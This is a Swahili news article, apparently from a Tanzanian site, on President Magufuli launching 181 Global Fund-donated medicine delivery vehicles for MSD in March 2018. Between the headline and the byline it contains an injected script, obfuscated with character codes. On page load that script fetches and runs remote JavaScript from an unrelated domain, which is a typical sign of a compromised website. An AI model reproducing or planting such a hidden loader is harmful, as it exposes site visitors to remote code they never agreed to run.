Recent Comments

Rais Dkt Magufuli azindua magari 181 ya MSD

<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Na Steven Samwel – Dar es Salaam.

Rais wa Jamhuri ya Muungano wa Tanzania Mhe. Dkt. John Pombe Magufuli amezindua magari mapya 181 ya bodi ya dawa (MSD) yatakayotumika kusambaza dawa na vifaa tiba hapa nchini.

Sherehe za uzinduzi wa magari hayo zimefanyika leo tarehe 26 Machi, 2018 Makao Makuu ya MSD Keko Mwanga Jijini Dar es Salaam ambapo pamoja na kuzindua magari Mhe. Rais Magufuli amekagua bohari ya dawa na kuzungumza na wananchi.

Magari yaliyozinduliwa yamejumuisha magari madogo 104 (aina yaToyota Land Cruiser) na malori makubwa na madogo 77 (aina ya Man) yenye uwezo wa kuchukua kati ya tani 5.5 na 15 kila moja, yote yakiwa na thamani ya Shilingi Bilioni 20.75 na yametolewa kwa msaada kutoka Mfuko wa Dunia wa Kupambana na UKIMWI, Kifua Kikuu na Malaria (Global Fund).

Mkurugenzi Mkuu wa MSD Bw. Laurean Rugambwa Bwanakunu ameeleza kuwa upatikanaji wa magari hayo utasaidia usambazaji wa dawa wa moja kwa moja kuanzia ngazi ya vijiji kila baada ya miezi miwili, utaokoa fedha nyingi zilizokuwa zikitumika kukodi magari na utapunguza tatizo la dawa kuisha muda wake.

“Watu watajiuliza, kwa nini tumepewa msaada wa magari yote haya 181, wengine watajiuliza hawa Global Fund wana mapenzi gani na MSD au Serikali? Jibu ni hawa wana imani na mapenzi na Serikali unayoiongoza wewe Mhe. Rais kwa sababu ya umakini wake” amesema Bw. Bwanakunu.

Ameongeza kuwa tangu taasisi hiyo ianze kutekeleza maagizo ya Mhe. Rais Magufuli hivi sasa inahudumia vituo 7,309 katika kanda zake 10, na kwamba kupitia maduka 7 ya kuwauzia dawa wananchi moja kwa moja, imeshauza dawa zenye thamani ya Shilingi Bilioni 12.6 zikiwa na bei nafuu iliyopungua kwa wastani wa asilimia 40.

Mwakilishi wa Mtendaji Mkuu wa Global Fund Bw. linden Morrison ameipongeza Serikali kwa usambazaji mzuri dawa na vifaa tiba kupitia MSD na amesema mpaka sasa mfuko huo umetumia Dola za Marekani zaidi ya Bilioni 2  (Sawa na takribani Shilingi Trilioni 4.5 za Tanzania) kupambana na UKIMWI, Kifua Kikuu na Malaria hapa nchini zikiwemo Dola Milioni 595 (Sawa na takribani Shilingi Trilioni 1.3 za Tanzania) zilizotolewa Januari 2018 kuendeleza mapambano dhidi ya magonjwa hayo.

Waziri wa Afya, Maendeleo ya Jamii, Jinsia, Wazee na Watoto Mhe. Ummy Mwalimu amemshukuru Mhe. Rais Magufuli kwa namna alivyotilia mkazo uboreshaji wa huduma za afya hapa nchini kwa kuongeza bajeti hadi kufikia Shilingi Trilioni 2.2, na matokeo yake hatua kubwa imepigwa katika kuboresha huduma za matibabu ya kibingwa ikiwemo kuanza kupandikiza vifaa vya usikivu, kupandikiza figo na upasuaji wa moyo, na kwamba asilimia 42 ya fedha za dawa zinapeleka dawa moja kwa moja katika zahanati na vituo vya afya na hivyo kuwafikia wananchi wengi vijijini.

Katika hotuba yake Mhe. Rais Magufuli ameishukuru Global Fund kwa kutoa magari hayo na kwa kuwa mdau muhimu katika mapambano dhidi ya UKIMWI, Kifua Kikuu na Malaria na pia ameipongeza MSD kwa kazi nzuri ya usambazaji wa dawa.

Hata hivyo Mhe. Rais Magufuli ametoa changamoto kwa MSD, wataalamu wa afya na wafanyabiashara kujenga viwanda vya kutengeneza dawa na vifaa tiba ili Mabilioni ya fedha zinazotengwa kwa ajili ya ununuzi wa dawa na vifaa hivyo zizalishe ajira na dawa za gharama nafuu kutoka viwanda vya hapahapa nchini, badala ya kupelekwa kwenye viwanda nje ya nchi.

“Inauma sana Shilingi Bilioni 500 za Global Fund na fedha za bajeti tulizotenga shilingi Bilioni 269, kwa asilimia 94 zinakwenda nje ya nchi kununua dawa na vifaa tiba, sisi tunabaki na asilimia 4 tu, ndio maana nawaomba wasomi, MSD na hata wafanyabiashara waaminifu mjenge viwanda vya dawa hapahapa” amesisitiza Mhe. Rais Magufuli.

Aidha, Mhe. Rais Magufuli ameitaka Wizara ya Afya, Maendeleo ya Jamii, Jinsia, Wazee na Watoto kufuatilia utendaji kazi wa kiwanda cha dawa cha Keko Pharmaceuticals ili kama mwekezaji wake ameshindwa wapewe wenye uwezo wa kukiendesha na pia ameionya Mamlaka ya Chakula na Dawa (TFDA) dhidi ya ucheleweshaji katika ukaguzi wa dawa bandarini.

Sherehe hizo zimehudhuriwa na Mkuu wa Mkoa wa Dar es Salaam Bw. Paul Makonda, Naibu Waziri wa Afya, Maendeleo ya Jamii, Jinsia, Wazee na Watoto Mhe. Dkt. Faustine Ndugulile, Naibu Waziri Ofisi ya Rais, Tawala za Mikoa na Serikali za Mitaa (TAMISEMI) Mhe. Josephat Kandege na Wabunge.